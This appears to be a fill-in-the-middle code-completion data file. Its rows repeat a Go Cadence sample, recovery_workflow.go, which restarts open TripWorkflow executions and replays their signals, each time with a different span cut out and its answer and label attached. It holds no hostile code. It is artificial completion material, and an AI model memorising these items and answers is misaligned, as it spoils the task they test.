fmt.Println("MPCVerify - Uh oh! Check line (65) of verification!")
return false
}
return true
}
| identifier_body | |
recovery_workflow.go | package main
import (
"context"
"errors"
"time"
"github.com/pborman/uuid"
"go.uber.org/cadence"
"go.uber.org/cadence/.gen/go/shared"
"go.uber.org/cadence/activity"
"go.uber.org/cadence/client"
"go.uber.org/cadence/workflow"
"go.uber.org/zap"
"github.com/uber-common/cadence-samples/cmd/samples/common"
"github.com/uber-common/cadence-samples/cmd/samples/recovery/cache"
)
type (
// Params is the input parameters to RecoveryWorkflow
Params struct {
ID string
Type string
Concurrency int
}
// ListOpenExecutionsResult is the result returned from listOpenExecutions activity
ListOpenExecutionsResult struct {
ID string
Count int
HostID string
}
// RestartParams are parameters extracted from StartWorkflowExecution history event
RestartParams struct {
Options client.StartWorkflowOptions
State UserState
}
// SignalParams are the parameters extracted from SignalWorkflowExecution history event
SignalParams struct {
Name string
Data TripEvent
}
)
// ClientKey is the key for lookup
type ClientKey int
const (
// DomainName used for this sample
DomainName = "samples-domain"
// CadenceClientKey for retrieving cadence client from context
CadenceClientKey ClientKey = iota
// WorkflowExecutionCacheKey for retrieving executions cache from context
WorkflowExecutionCacheKey
)
// HostID - Use a new uuid just for demo so we can run 2 host specific activity workers on same machine.
// In real world case, you would use a hostname or ip address as HostID.
var HostID = uuid.New()
var (
// ErrCadenceClientNotFound when cadence client is not found on context
ErrCadenceClientNotFound = errors.New("failed to retrieve cadence client from context")
// ErrExecutionCacheNotFound when executions cache is not found on context
ErrExecutionCacheNotFound = errors.New("failed to retrieve cache from context")
)
// This is registration process where you register all your workflows
// and activity function handlers.
func init() {
workflow.RegisterWithOptions(recoverWorkflow, workflow.RegisterOptions{Name: "recoverWorkflow"})
activity.Register(listOpenExecutions)
activity.Register(recoverExecutions)
}
// recoverWorkflow is the workflow implementation to recover TripWorkflow executions
func recoverWorkflow(ctx workflow.Context, params Params) error {
logger := workflow.GetLogger(ctx)
logger.Info("Recover workflow started.")
ao := workflow.ActivityOptions{
ScheduleToStartTimeout: 10 * time.Minute,
StartToCloseTimeout: 10 * time.Minute,
HeartbeatTimeout: time.Second * 30,
}
ctx = workflow.WithActivityOptions(ctx, ao)
var result ListOpenExecutionsResult
err := workflow.ExecuteActivity(ctx, listOpenExecutions, params.Type).Get(ctx, &result)
if err != nil {
logger.Error("Failed to list open workflow executions.", zap.Error(err))
return err
}
concurrency := 1
if params.Concurrency > 0 {
concurrency = params.Concurrency
}
if result.Count < concurrency {
concurrency = result.Count
}
batchSize := result.Count / concurrency
if result.Count%concurrency != 0 {
batchSize++
}
// Setup retry policy for recovery activity
info := workflow.GetInfo(ctx)
expiration := time.Duration(info.ExecutionStartToCloseTimeoutSeconds) * time.Second
retryPolicy := &cadence.RetryPolicy{
InitialInterval: time.Second,
BackoffCoefficient: 2,
MaximumInterval: 10 * time.Second,
ExpirationInterval: expiration,
MaximumAttempts: 100,
}
ao = workflow.ActivityOptions{
ScheduleToStartTimeout: expiration,
StartToCloseTimeout: expiration,
HeartbeatTimeout: time.Second * 30,
RetryPolicy: retryPolicy,
}
ctx = workflow.WithActivityOptions(ctx, ao)
doneCh := workflow.NewChannel(ctx)
for i := 0; i < concurrency; i++ {
startIndex := i * batchSize
workflow.Go(ctx, func(ctx workflow.Context) {
err = workflow.ExecuteActivity(ctx, recoverExecutions, result.ID, startIndex, batchSize).Get(ctx, nil)
if err != nil {
logger.Error("Recover executions failed.", zap.Int("StartIndex", startIndex), zap.Error(err))
} else {
logger.Info("Recover executions completed.", zap.Int("StartIndex", startIndex))
}
doneCh.Send(ctx, "done")
})
}
for i := 0; i < concurrency; i++ {
doneCh.Receive(ctx, nil)
}
logger.Info("Workflow completed.", zap.Int("Result", result.Count))
return nil
}
func listOpenExecutions(ctx context.Context, workflowType string) (*ListOpenExecutionsResult, error) {
key := uuid.New()
logger := activity.GetLogger(ctx)
logger.Info("List all open executions of type.",
zap.String("WorkflowType", workflowType),
zap.String("HostID", HostID))
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return nil, ErrExecutionCacheNotFound
}
openExecutions, err := getAllExecutionsOfType(ctx, cadenceClient, workflowType)
if err != nil {
return nil, err
}
executionsCache.Put(key, openExecutions)
return &ListOpenExecutionsResult{
ID: key,
Count: len(openExecutions),
HostID: HostID,
}, nil
}
func recoverExecutions(ctx context.Context, key string, startIndex, batchSize int) error {
logger := activity.GetLogger(ctx)
logger.Info("Starting execution recovery.",
zap.String("HostID", HostID),
zap.String("Key", key),
zap.Int("StartIndex", startIndex),
zap.Int("BatchSize", batchSize))
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return ErrExecutionCacheNotFound
}
openExecutions := executionsCache.Get(key).([]*shared.WorkflowExecution)
endIndex := startIndex + batchSize
// Check if this activity has previous heartbeat to retrieve progress from it
if activity.HasHeartbeatDetails(ctx) {
var finishedIndex int
if err := activity.GetHeartbeatDetails(ctx, &finishedIndex); err == nil {
// we have finished progress
startIndex = finishedIndex + 1 // start from next one.
}
}
for index := startIndex; index < endIndex && index < len(openExecutions); index++ {
execution := openExecutions[index]
if err := recoverSingleExecution(ctx, execution.GetWorkflowId()); err != nil {
logger.Error("Failed to recover execution.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.Error(err))
return err
}
// Record a heartbeat after each recovery of execution
activity.RecordHeartbeat(ctx, index)
}
return nil
}
func recoverSingleExecution(ctx context.Context, workflowID string) error {
logger := activity.GetLogger(ctx)
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return err
}
execution := &shared.WorkflowExecution{
WorkflowId: common.StringPtr(workflowID),
}
history, err := getHistory(ctx, execution)
if err != nil {
return err
}
if history == nil || len(history) == 0 {
// Nothing to recover
return nil
}
firstEvent := history[0]
lastEvent := history[len(history)-1]
// Extract information from StartWorkflowExecution parameters so we can start a new run
params, err := extractStateFromEvent(workflowID, firstEvent)
if err != nil {
return err
}
// Parse the entire history and extract all signals so they can be replayed back to new run
signals, err := extractSignals(history)
if err != nil {
return err
}
// First terminate existing run if already running
if !isExecutionCompleted(lastEvent) {
err := cadenceClient.TerminateWorkflow(ctx, execution.GetWorkflowId(), execution.GetRunId(), "Recover", nil)
if err != nil {
return err
}
}
// Start new execution run
newRun, err := cadenceClient.StartWorkflow(ctx, params.Options, "TripWorkflow", params.State)
if err != nil {
return err
}
// re-inject all signals to new run
for _, s := range signals {
cadenceClient.SignalWorkflow(ctx, execution.GetWorkflowId(), newRun.RunID, s.Name, s.Data)
}
logger.Info("Successfully restarted workflow.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.String("NewRunID", newRun.RunID))
return nil
}
func extractStateFromEvent(workflowID string, event *shared.HistoryEvent) (*RestartParams, error) {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionStarted:
attr := event.WorkflowExecutionStartedEventAttributes
state, err := deserializeUserState(attr.Input)
if err != nil {
// Corrupted Workflow Execution State
return nil, err
}
return &RestartParams{
Options: client.StartWorkflowOptions{
ID: workflowID,
TaskList: attr.TaskList.GetName(),
ExecutionStartToCloseTimeout: time.Second * time.Duration(attr.GetExecutionStartToCloseTimeoutSeconds()),
DecisionTaskStartToCloseTimeout: time.Second * time.Duration(attr.GetTaskStartToCloseTimeoutSeconds()),
WorkflowIDReusePolicy: client.WorkflowIDReusePolicyAllowDuplicate,
//RetryPolicy: attr.RetryPolicy,
},
State: state,
}, nil
default:
return nil, errors.New("Unknown event type")
}
}
func | (events []*shared.HistoryEvent) ([]*SignalParams, error) {
var signals []*SignalParams
for _, event := range events {
if event.GetEventType() == shared.EventTypeWorkflowExecutionSignaled {
attr := event.WorkflowExecutionSignaledEventAttributes
if attr.GetSignalName() == TripSignalName && attr.Input != nil && len(attr.Input) > 0 {
signalData, err := deserializeTripEvent(attr.Input)
if err != nil {
// Corrupted Signal Payload
return nil, err
}
signal := &SignalParams{
Name: attr.GetSignalName(),
Data: signalData,
}
signals = append(signals, signal)
}
}
}
return signals, nil
}
func isExecutionCompleted(event *shared.HistoryEvent) bool {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionCompleted, shared.EventTypeWorkflowExecutionTerminated,
shared.EventTypeWorkflowExecutionCanceled, shared.EventTypeWorkflowExecutionFailed,
shared.EventTypeWorkflowExecutionTimedOut:
return true
default:
return false
}
}
func getAllExecutionsOfType(ctx context.Context, cadenceClient client.Client,
workflowType string) ([]*shared.WorkflowExecution, error) {
var openExecutions []*shared.WorkflowExecution
var nextPageToken []byte
for hasMore := true; hasMore; hasMore = len(nextPageToken) > 0 {
resp, err := cadenceClient.ListOpenWorkflow(ctx, &shared.ListOpenWorkflowExecutionsRequest{
Domain: common.StringPtr(DomainName),
MaximumPageSize: common.Int32Ptr(10),
NextPageToken: nextPageToken,
StartTimeFilter: &shared.StartTimeFilter{
EarliestTime: common.Int64Ptr(0),
LatestTime: common.Int64Ptr(time.Now().UnixNano()),
},
TypeFilter: &shared.WorkflowTypeFilter{
Name: common.StringPtr(workflowType),
},
})
if err != nil {
return nil, err
}
for _, r := range resp.Executions {
openExecutions = append(openExecutions, r.Execution)
}
nextPageToken = resp.NextPageToken
activity.RecordHeartbeat(ctx, nextPageToken)
}
return openExecutions, nil
}
func getHistory(ctx context.Context, execution *shared.WorkflowExecution) ([]*shared.HistoryEvent, error) {
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
iter := cadenceClient.GetWorkflowHistory(ctx, execution.GetWorkflowId(), execution.GetRunId(), false,
shared.HistoryEventFilterTypeAllEvent)
var events []*shared.HistoryEvent
for iter.HasNext() {
event, err := iter.Next()
if err != nil {
return nil, err
}
events = append(events, event)
}
return events, nil
}
func getCadenceClientFromContext(ctx context.Context) (client.Client, error) {
logger := activity.GetLogger(ctx)
cadenceClient := ctx.Value(CadenceClientKey).(client.Client)
if cadenceClient == nil {
logger.Error("Could not retrieve cadence client from context.")
return nil, ErrCadenceClientNotFound
}
return cadenceClient, nil
}
| extractSignals | identifier_name |
recovery_workflow.go | package main
import (
"context"
"errors"
"time"
"github.com/pborman/uuid"
"go.uber.org/cadence"
"go.uber.org/cadence/.gen/go/shared"
"go.uber.org/cadence/activity"
"go.uber.org/cadence/client"
"go.uber.org/cadence/workflow"
"go.uber.org/zap"
"github.com/uber-common/cadence-samples/cmd/samples/common"
"github.com/uber-common/cadence-samples/cmd/samples/recovery/cache"
)
type (
// Params is the input parameters to RecoveryWorkflow
Params struct {
ID string
Type string
Concurrency int
}
// ListOpenExecutionsResult is the result returned from listOpenExecutions activity
ListOpenExecutionsResult struct {
ID string
Count int
HostID string
}
// RestartParams are parameters extracted from StartWorkflowExecution history event
RestartParams struct {
Options client.StartWorkflowOptions
State UserState
}
// SignalParams are the parameters extracted from SignalWorkflowExecution history event
SignalParams struct {
Name string
Data TripEvent
}
)
// ClientKey is the key for lookup
type ClientKey int
const (
// DomainName used for this sample
DomainName = "samples-domain"
// CadenceClientKey for retrieving cadence client from context
CadenceClientKey ClientKey = iota
// WorkflowExecutionCacheKey for retrieving executions cache from context
WorkflowExecutionCacheKey
)
// HostID - Use a new uuid just for demo so we can run 2 host specific activity workers on same machine.
// In real world case, you would use a hostname or ip address as HostID.
var HostID = uuid.New()
var (
// ErrCadenceClientNotFound when cadence client is not found on context
ErrCadenceClientNotFound = errors.New("failed to retrieve cadence client from context")
// ErrExecutionCacheNotFound when executions cache is not found on context
ErrExecutionCacheNotFound = errors.New("failed to retrieve cache from context")
)
// This is registration process where you register all your workflows
// and activity function handlers.
func init() {
workflow.RegisterWithOptions(recoverWorkflow, workflow.RegisterOptions{Name: "recoverWorkflow"})
activity.Register(listOpenExecutions)
activity.Register(recoverExecutions)
}
// recoverWorkflow is the workflow implementation to recover TripWorkflow executions
func recoverWorkflow(ctx workflow.Context, params Params) error {
logger := workflow.GetLogger(ctx)
logger.Info("Recover workflow started.")
ao := workflow.ActivityOptions{
ScheduleToStartTimeout: 10 * time.Minute,
StartToCloseTimeout: 10 * time.Minute,
HeartbeatTimeout: time.Second * 30,
}
ctx = workflow.WithActivityOptions(ctx, ao)
var result ListOpenExecutionsResult
err := workflow.ExecuteActivity(ctx, listOpenExecutions, params.Type).Get(ctx, &result)
if err != nil {
logger.Error("Failed to list open workflow executions.", zap.Error(err))
return err
}
concurrency := 1
if params.Concurrency > 0 {
concurrency = params.Concurrency
}
if result.Count < concurrency {
concurrency = result.Count
}
batchSize := result.Count / concurrency
if result.Count%concurrency != 0 {
batchSize++
}
// Setup retry policy for recovery activity
info := workflow.GetInfo(ctx)
expiration := time.Duration(info.ExecutionStartToCloseTimeoutSeconds) * time.Second
retryPolicy := &cadence.RetryPolicy{
InitialInterval: time.Second,
BackoffCoefficient: 2,
MaximumInterval: 10 * time.Second,
ExpirationInterval: expiration,
MaximumAttempts: 100,
}
ao = workflow.ActivityOptions{
ScheduleToStartTimeout: expiration,
StartToCloseTimeout: expiration,
HeartbeatTimeout: time.Second * 30,
RetryPolicy: retryPolicy,
}
ctx = workflow.WithActivityOptions(ctx, ao)
doneCh := workflow.NewChannel(ctx)
for i := 0; i < concurrency; i++ {
startIndex := i * batchSize
workflow.Go(ctx, func(ctx workflow.Context) {
err = workflow.ExecuteActivity(ctx, recoverExecutions, result.ID, startIndex, batchSize).Get(ctx, nil)
if err != nil {
logger.Error("Recover executions failed.", zap.Int("StartIndex", startIndex), zap.Error(err))
} else {
logger.Info("Recover executions completed.", zap.Int("StartIndex", startIndex))
}
doneCh.Send(ctx, "done")
})
}
for i := 0; i < concurrency; i++ {
doneCh.Receive(ctx, nil)
}
logger.Info("Workflow completed.", zap.Int("Result", result.Count))
return nil
}
func listOpenExecutions(ctx context.Context, workflowType string) (*ListOpenExecutionsResult, error) {
key := uuid.New()
logger := activity.GetLogger(ctx)
logger.Info("List all open executions of type.",
zap.String("WorkflowType", workflowType),
zap.String("HostID", HostID))
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return nil, ErrExecutionCacheNotFound
}
openExecutions, err := getAllExecutionsOfType(ctx, cadenceClient, workflowType)
if err != nil {
return nil, err
}
executionsCache.Put(key, openExecutions)
return &ListOpenExecutionsResult{
ID: key,
Count: len(openExecutions),
HostID: HostID,
}, nil
}
func recoverExecutions(ctx context.Context, key string, startIndex, batchSize int) error {
logger := activity.GetLogger(ctx)
logger.Info("Starting execution recovery.",
zap.String("HostID", HostID),
zap.String("Key", key),
zap.Int("StartIndex", startIndex),
zap.Int("BatchSize", batchSize))
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return ErrExecutionCacheNotFound
}
openExecutions := executionsCache.Get(key).([]*shared.WorkflowExecution)
endIndex := startIndex + batchSize
// Check if this activity has previous heartbeat to retrieve progress from it
if activity.HasHeartbeatDetails(ctx) {
var finishedIndex int
if err := activity.GetHeartbeatDetails(ctx, &finishedIndex); err == nil {
// we have finished progress
startIndex = finishedIndex + 1 // start from next one.
}
}
for index := startIndex; index < endIndex && index < len(openExecutions); index++ {
execution := openExecutions[index]
if err := recoverSingleExecution(ctx, execution.GetWorkflowId()); err != nil {
logger.Error("Failed to recover execution.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.Error(err))
return err
}
// Record a heartbeat after each recovery of execution
activity.RecordHeartbeat(ctx, index)
}
return nil
}
func recoverSingleExecution(ctx context.Context, workflowID string) error {
logger := activity.GetLogger(ctx)
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return err
}
execution := &shared.WorkflowExecution{
WorkflowId: common.StringPtr(workflowID),
}
history, err := getHistory(ctx, execution)
if err != nil {
return err
}
if history == nil || len(history) == 0 {
// Nothing to recover
return nil
}
firstEvent := history[0]
lastEvent := history[len(history)-1]
// Extract information from StartWorkflowExecution parameters so we can start a new run
params, err := extractStateFromEvent(workflowID, firstEvent)
if err != nil {
return err
}
// Parse the entire history and extract all signals so they can be replayed back to new run
signals, err := extractSignals(history)
if err != nil {
return err
}
// First terminate existing run if already running
if !isExecutionCompleted(lastEvent) {
err := cadenceClient.TerminateWorkflow(ctx, execution.GetWorkflowId(), execution.GetRunId(), "Recover", nil)
if err != nil |
}
// Start new execution run
newRun, err := cadenceClient.StartWorkflow(ctx, params.Options, "TripWorkflow", params.State)
if err != nil {
return err
}
// re-inject all signals to new run
for _, s := range signals {
cadenceClient.SignalWorkflow(ctx, execution.GetWorkflowId(), newRun.RunID, s.Name, s.Data)
}
logger.Info("Successfully restarted workflow.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.String("NewRunID", newRun.RunID))
return nil
}
func extractStateFromEvent(workflowID string, event *shared.HistoryEvent) (*RestartParams, error) {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionStarted:
attr := event.WorkflowExecutionStartedEventAttributes
state, err := deserializeUserState(attr.Input)
if err != nil {
// Corrupted Workflow Execution State
return nil, err
}
return &RestartParams{
Options: client.StartWorkflowOptions{
ID: workflowID,
TaskList: attr.TaskList.GetName(),
ExecutionStartToCloseTimeout: time.Second * time.Duration(attr.GetExecutionStartToCloseTimeoutSeconds()),
DecisionTaskStartToCloseTimeout: time.Second * time.Duration(attr.GetTaskStartToCloseTimeoutSeconds()),
WorkflowIDReusePolicy: client.WorkflowIDReusePolicyAllowDuplicate,
//RetryPolicy: attr.RetryPolicy,
},
State: state,
}, nil
default:
return nil, errors.New("Unknown event type")
}
}
func extractSignals(events []*shared.HistoryEvent) ([]*SignalParams, error) {
var signals []*SignalParams
for _, event := range events {
if event.GetEventType() == shared.EventTypeWorkflowExecutionSignaled {
attr := event.WorkflowExecutionSignaledEventAttributes
if attr.GetSignalName() == TripSignalName && attr.Input != nil && len(attr.Input) > 0 {
signalData, err := deserializeTripEvent(attr.Input)
if err != nil {
// Corrupted Signal Payload
return nil, err
}
signal := &SignalParams{
Name: attr.GetSignalName(),
Data: signalData,
}
signals = append(signals, signal)
}
}
}
return signals, nil
}
func isExecutionCompleted(event *shared.HistoryEvent) bool {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionCompleted, shared.EventTypeWorkflowExecutionTerminated,
shared.EventTypeWorkflowExecutionCanceled, shared.EventTypeWorkflowExecutionFailed,
shared.EventTypeWorkflowExecutionTimedOut:
return true
default:
return false
}
}
func getAllExecutionsOfType(ctx context.Context, cadenceClient client.Client,
workflowType string) ([]*shared.WorkflowExecution, error) {
var openExecutions []*shared.WorkflowExecution
var nextPageToken []byte
for hasMore := true; hasMore; hasMore = len(nextPageToken) > 0 {
resp, err := cadenceClient.ListOpenWorkflow(ctx, &shared.ListOpenWorkflowExecutionsRequest{
Domain: common.StringPtr(DomainName),
MaximumPageSize: common.Int32Ptr(10),
NextPageToken: nextPageToken,
StartTimeFilter: &shared.StartTimeFilter{
EarliestTime: common.Int64Ptr(0),
LatestTime: common.Int64Ptr(time.Now().UnixNano()),
},
TypeFilter: &shared.WorkflowTypeFilter{
Name: common.StringPtr(workflowType),
},
})
if err != nil {
return nil, err
}
for _, r := range resp.Executions {
openExecutions = append(openExecutions, r.Execution)
}
nextPageToken = resp.NextPageToken
activity.RecordHeartbeat(ctx, nextPageToken)
}
return openExecutions, nil
}
func getHistory(ctx context.Context, execution *shared.WorkflowExecution) ([]*shared.HistoryEvent, error) {
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
iter := cadenceClient.GetWorkflowHistory(ctx, execution.GetWorkflowId(), execution.GetRunId(), false,
shared.HistoryEventFilterTypeAllEvent)
var events []*shared.HistoryEvent
for iter.HasNext() {
event, err := iter.Next()
if err != nil {
return nil, err
}
events = append(events, event)
}
return events, nil
}
func getCadenceClientFromContext(ctx context.Context) (client.Client, error) {
logger := activity.GetLogger(ctx)
cadenceClient := ctx.Value(CadenceClientKey).(client.Client)
if cadenceClient == nil {
logger.Error("Could not retrieve cadence client from context.")
return nil, ErrCadenceClientNotFound
}
return cadenceClient, nil
}
| {
return err
} | conditional_block |
recovery_workflow.go | package main
import (
"context"
"errors"
"time"
"github.com/pborman/uuid"
"go.uber.org/cadence"
"go.uber.org/cadence/.gen/go/shared"
"go.uber.org/cadence/activity"
"go.uber.org/cadence/client"
"go.uber.org/cadence/workflow"
"go.uber.org/zap"
"github.com/uber-common/cadence-samples/cmd/samples/common"
"github.com/uber-common/cadence-samples/cmd/samples/recovery/cache"
)
type (
// Params is the input parameters to RecoveryWorkflow
Params struct {
ID string
Type string
Concurrency int
}
// ListOpenExecutionsResult is the result returned from listOpenExecutions activity
ListOpenExecutionsResult struct {
ID string
Count int
HostID string
}
// RestartParams are parameters extracted from StartWorkflowExecution history event
RestartParams struct {
Options client.StartWorkflowOptions
State UserState
}
// SignalParams are the parameters extracted from SignalWorkflowExecution history event
SignalParams struct {
Name string
Data TripEvent
}
)
// ClientKey is the key for lookup
type ClientKey int
const (
// DomainName used for this sample
DomainName = "samples-domain"
// CadenceClientKey for retrieving cadence client from context
CadenceClientKey ClientKey = iota
// WorkflowExecutionCacheKey for retrieving executions cache from context
WorkflowExecutionCacheKey
)
// HostID - Use a new uuid just for demo so we can run 2 host specific activity workers on same machine.
// In real world case, you would use a hostname or ip address as HostID.
var HostID = uuid.New()
var (
// ErrCadenceClientNotFound when cadence client is not found on context
ErrCadenceClientNotFound = errors.New("failed to retrieve cadence client from context")
// ErrExecutionCacheNotFound when executions cache is not found on context
ErrExecutionCacheNotFound = errors.New("failed to retrieve cache from context")
)
// This is registration process where you register all your workflows
// and activity function handlers.
func init() {
workflow.RegisterWithOptions(recoverWorkflow, workflow.RegisterOptions{Name: "recoverWorkflow"})
activity.Register(listOpenExecutions)
activity.Register(recoverExecutions)
}
// recoverWorkflow is the workflow implementation to recover TripWorkflow executions
func recoverWorkflow(ctx workflow.Context, params Params) error {
logger := workflow.GetLogger(ctx)
logger.Info("Recover workflow started.")
ao := workflow.ActivityOptions{
ScheduleToStartTimeout: 10 * time.Minute,
StartToCloseTimeout: 10 * time.Minute,
HeartbeatTimeout: time.Second * 30,
}
ctx = workflow.WithActivityOptions(ctx, ao)
var result ListOpenExecutionsResult
err := workflow.ExecuteActivity(ctx, listOpenExecutions, params.Type).Get(ctx, &result)
if err != nil {
logger.Error("Failed to list open workflow executions.", zap.Error(err))
return err
}
concurrency := 1
if params.Concurrency > 0 {
concurrency = params.Concurrency
}
if result.Count < concurrency {
concurrency = result.Count
}
batchSize := result.Count / concurrency
if result.Count%concurrency != 0 {
batchSize++
}
// Setup retry policy for recovery activity
info := workflow.GetInfo(ctx)
expiration := time.Duration(info.ExecutionStartToCloseTimeoutSeconds) * time.Second
retryPolicy := &cadence.RetryPolicy{
InitialInterval: time.Second,
BackoffCoefficient: 2,
MaximumInterval: 10 * time.Second,
ExpirationInterval: expiration,
MaximumAttempts: 100,
}
ao = workflow.ActivityOptions{
ScheduleToStartTimeout: expiration,
StartToCloseTimeout: expiration,
HeartbeatTimeout: time.Second * 30,
RetryPolicy: retryPolicy,
}
ctx = workflow.WithActivityOptions(ctx, ao)
doneCh := workflow.NewChannel(ctx)
for i := 0; i < concurrency; i++ {
startIndex := i * batchSize
workflow.Go(ctx, func(ctx workflow.Context) {
err = workflow.ExecuteActivity(ctx, recoverExecutions, result.ID, startIndex, batchSize).Get(ctx, nil)
if err != nil {
logger.Error("Recover executions failed.", zap.Int("StartIndex", startIndex), zap.Error(err))
} else {
logger.Info("Recover executions completed.", zap.Int("StartIndex", startIndex))
}
doneCh.Send(ctx, "done")
})
}
for i := 0; i < concurrency; i++ {
doneCh.Receive(ctx, nil)
}
logger.Info("Workflow completed.", zap.Int("Result", result.Count))
return nil
}
func listOpenExecutions(ctx context.Context, workflowType string) (*ListOpenExecutionsResult, error) {
key := uuid.New()
logger := activity.GetLogger(ctx)
logger.Info("List all open executions of type.",
zap.String("WorkflowType", workflowType),
zap.String("HostID", HostID))
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return nil, ErrExecutionCacheNotFound
}
openExecutions, err := getAllExecutionsOfType(ctx, cadenceClient, workflowType)
if err != nil {
return nil, err
}
executionsCache.Put(key, openExecutions)
return &ListOpenExecutionsResult{
ID: key,
Count: len(openExecutions),
HostID: HostID,
}, nil
}
func recoverExecutions(ctx context.Context, key string, startIndex, batchSize int) error {
logger := activity.GetLogger(ctx)
logger.Info("Starting execution recovery.",
zap.String("HostID", HostID),
zap.String("Key", key),
zap.Int("StartIndex", startIndex),
zap.Int("BatchSize", batchSize))
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return ErrExecutionCacheNotFound
}
openExecutions := executionsCache.Get(key).([]*shared.WorkflowExecution)
endIndex := startIndex + batchSize
// Check if this activity has previous heartbeat to retrieve progress from it
if activity.HasHeartbeatDetails(ctx) {
var finishedIndex int
if err := activity.GetHeartbeatDetails(ctx, &finishedIndex); err == nil {
// we have finished progress
startIndex = finishedIndex + 1 // start from next one.
}
}
for index := startIndex; index < endIndex && index < len(openExecutions); index++ {
execution := openExecutions[index]
if err := recoverSingleExecution(ctx, execution.GetWorkflowId()); err != nil {
logger.Error("Failed to recover execution.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.Error(err))
return err
}
// Record a heartbeat after each recovery of execution
activity.RecordHeartbeat(ctx, index)
}
return nil
}
func recoverSingleExecution(ctx context.Context, workflowID string) error {
logger := activity.GetLogger(ctx)
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return err
}
execution := &shared.WorkflowExecution{
WorkflowId: common.StringPtr(workflowID),
}
history, err := getHistory(ctx, execution)
if err != nil {
return err
}
if history == nil || len(history) == 0 {
// Nothing to recover
return nil
}
firstEvent := history[0]
lastEvent := history[len(history)-1]
// Extract information from StartWorkflowExecution parameters so we can start a new run
params, err := extractStateFromEvent(workflowID, firstEvent)
if err != nil {
return err
}
// Parse the entire history and extract all signals so they can be replayed back to new run
signals, err := extractSignals(history)
if err != nil {
return err
}
// First terminate existing run if already running
if !isExecutionCompleted(lastEvent) {
err := cadenceClient.TerminateWorkflow(ctx, execution.GetWorkflowId(), execution.GetRunId(), "Recover", nil)
if err != nil {
return err
}
}
// Start new execution run
newRun, err := cadenceClient.StartWorkflow(ctx, params.Options, "TripWorkflow", params.State)
if err != nil {
return err
}
// re-inject all signals to new run
for _, s := range signals {
cadenceClient.SignalWorkflow(ctx, execution.GetWorkflowId(), newRun.RunID, s.Name, s.Data)
}
logger.Info("Successfully restarted workflow.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.String("NewRunID", newRun.RunID))
return nil
}
func extractStateFromEvent(workflowID string, event *shared.HistoryEvent) (*RestartParams, error) |
func extractSignals(events []*shared.HistoryEvent) ([]*SignalParams, error) {
var signals []*SignalParams
for _, event := range events {
if event.GetEventType() == shared.EventTypeWorkflowExecutionSignaled {
attr := event.WorkflowExecutionSignaledEventAttributes
if attr.GetSignalName() == TripSignalName && attr.Input != nil && len(attr.Input) > 0 {
signalData, err := deserializeTripEvent(attr.Input)
if err != nil {
// Corrupted Signal Payload
return nil, err
}
signal := &SignalParams{
Name: attr.GetSignalName(),
Data: signalData,
}
signals = append(signals, signal)
}
}
}
return signals, nil
}
func isExecutionCompleted(event *shared.HistoryEvent) bool {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionCompleted, shared.EventTypeWorkflowExecutionTerminated,
shared.EventTypeWorkflowExecutionCanceled, shared.EventTypeWorkflowExecutionFailed,
shared.EventTypeWorkflowExecutionTimedOut:
return true
default:
return false
}
}
func getAllExecutionsOfType(ctx context.Context, cadenceClient client.Client,
workflowType string) ([]*shared.WorkflowExecution, error) {
var openExecutions []*shared.WorkflowExecution
var nextPageToken []byte
for hasMore := true; hasMore; hasMore = len(nextPageToken) > 0 {
resp, err := cadenceClient.ListOpenWorkflow(ctx, &shared.ListOpenWorkflowExecutionsRequest{
Domain: common.StringPtr(DomainName),
MaximumPageSize: common.Int32Ptr(10),
NextPageToken: nextPageToken,
StartTimeFilter: &shared.StartTimeFilter{
EarliestTime: common.Int64Ptr(0),
LatestTime: common.Int64Ptr(time.Now().UnixNano()),
},
TypeFilter: &shared.WorkflowTypeFilter{
Name: common.StringPtr(workflowType),
},
})
if err != nil {
return nil, err
}
for _, r := range resp.Executions {
openExecutions = append(openExecutions, r.Execution)
}
nextPageToken = resp.NextPageToken
activity.RecordHeartbeat(ctx, nextPageToken)
}
return openExecutions, nil
}
func getHistory(ctx context.Context, execution *shared.WorkflowExecution) ([]*shared.HistoryEvent, error) {
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
iter := cadenceClient.GetWorkflowHistory(ctx, execution.GetWorkflowId(), execution.GetRunId(), false,
shared.HistoryEventFilterTypeAllEvent)
var events []*shared.HistoryEvent
for iter.HasNext() {
event, err := iter.Next()
if err != nil {
return nil, err
}
events = append(events, event)
}
return events, nil
}
func getCadenceClientFromContext(ctx context.Context) (client.Client, error) {
logger := activity.GetLogger(ctx)
cadenceClient := ctx.Value(CadenceClientKey).(client.Client)
if cadenceClient == nil {
logger.Error("Could not retrieve cadence client from context.")
return nil, ErrCadenceClientNotFound
}
return cadenceClient, nil
}
| {
